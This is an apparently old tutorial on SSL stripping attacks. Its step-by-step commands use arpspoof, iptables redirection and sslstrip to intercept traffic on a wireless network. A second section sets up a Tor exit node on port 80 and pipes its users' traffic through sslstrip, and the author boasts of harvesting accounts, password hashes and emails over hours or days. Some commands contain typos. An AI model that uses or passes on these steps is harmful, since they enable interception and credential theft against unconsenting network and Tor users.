Juan J.

Fernandez

SSL and HTTP Exposed

SSL and HTTP Exposed

Secure Socket Layer is not secured as we might think. At least, throughout http and https.

Vulnerabilities are presented through the exchange of data across http https and http https . These are exploited using https stripping attacks, transparently hijacking http traffic on a network, watching for https links and redirects to map those links into look-alike http links.

SSLSTRIP tool do just exactly that and can be deployed through man in the middle attack on a wireless network using iptables, arpspoof. It can also be deployed on the Tor Network if you configure your computer as a relay exit node in port 80.

REQUIREMENT

I assume you are using a GNU/LINUX OS or Mac OSX SSLSTRIP: main tool for our stripping attack IPTABLE : to match our target traffic and redirect it to sslstrip ARPSPOOF: used in wireless network to make our computer look like router Tor as relay: to apply the concept once we enter another network

Wireless https striping attack

As root, type in the terminal: echo 1 > /proc/sus/net/ipv4/ip_forward and arpspoof -i <interface Ex: wlan0> <langatewayip ex: 192.168.1.1> . This will let or authorize your linux box to forward the packet and perform and arp injection to let every computer knows that your mac adress is the mac adress of the router, those forwarding all those packets to you. Now, open up another terminal as root and type iptables -t nat -A PREROUTING -p tcp destination-port 80 -j REDIRECT to-port 8080 This will set the filtering rule(firewall) as alter packets as soon as they come destinated to port 80 redirecting them to port 8080 Now, on the same terminal as root, type sslstrip -l 8080 -w sslstrip.log and on another terminal type tail -f sslstrip.log . At this point, sslstrip will do the job and neither the server nor the client knows that you are hijacking http and watching for https links to redirect and map those links into similar http links or homograph-similar https links. The tail command is to watch the log file as it increases.

Tor network https stripping attack

A wireless network is like any other network. Why not apply that to another network like Tor Network ? It just requires minor modification to iptable command and the elimination of arpspoof use and of course, set up Tor as relay.

Set up Tor relay

Tor is a network of relay, when a user uses tor, he or she pass along about three computers(relays) before they get to the final destination. I will show you how to be the exit node(last relay) We will be creating another account to apply the redirection for that uid (user id and not us) that will prevent the disconnection... Open up a terminal as root and type useradd toruser -u 111 -m and passwd toruser (use the password you like). Then logout from your account and login to toruser. Install Tor http://www.torproject.org/docs/tor-doc-unix.html.en For the purpose of this presentation, download the Tor Browser Bundle for GNU/Linux on http://www.torproject.org/download/download.html.en extract it tar xvfz file.tar.gz and cd to filedirectory run vidalia in filedirectory/App. Once it start running click setup relay and configure exit node to port 80 only. Make sure your router forward port 80, 9051, 9001 and 9030 to your local ip if you are behind the router's firewall. Once you test it and verify that it is reacheble form the outside by running it again, logout from toruser account and login back to your original account. Now the fun part starts...

Sniff out that Tor network !!!

Open a terminal and type su toruser and type the assined password.This is an important step to run the relay: Cd to tor-browser_en-US (in my case) file directory inside toruser account and run tor ./App/tor -f /home/toruser/tor-browser_en-US/Data/Tor/torrc Now that everything is running, reachable from outside, open up another terminal and as root type: iptables -t nat -I OUTPUT -p tcp -m owner --uid-owner 111 --dport 80 -j DNAT --to-destination 127.0.0.1:8080 Everything that comes from toruser will be redirected to localport 8080. DNAT means that match if the original destination differs from the reply source. This make sense when the OUTPUT match.(these are iptables details that worth to know to see what is really happening...) Now type sslstrip -l 8080 -w logfile and on another terminal to watch the file as it grows, tail -f logfile . Let it run couple of hours and days and you will see accounts, md5 hash, email messages, hosting accounts and more. Next page is just a small part of what I recollected from Tor Network.

References

DEFCON 17 http://www.youtube.com/watch?v=ibF36Yyeehw SSLSTRIP http://www.thoughtcrime.org/software/sslstrip/ Tor http://www.torproject.org/docs/documentation.html.en IPTABLES http://linux.die.net/man/8/iptables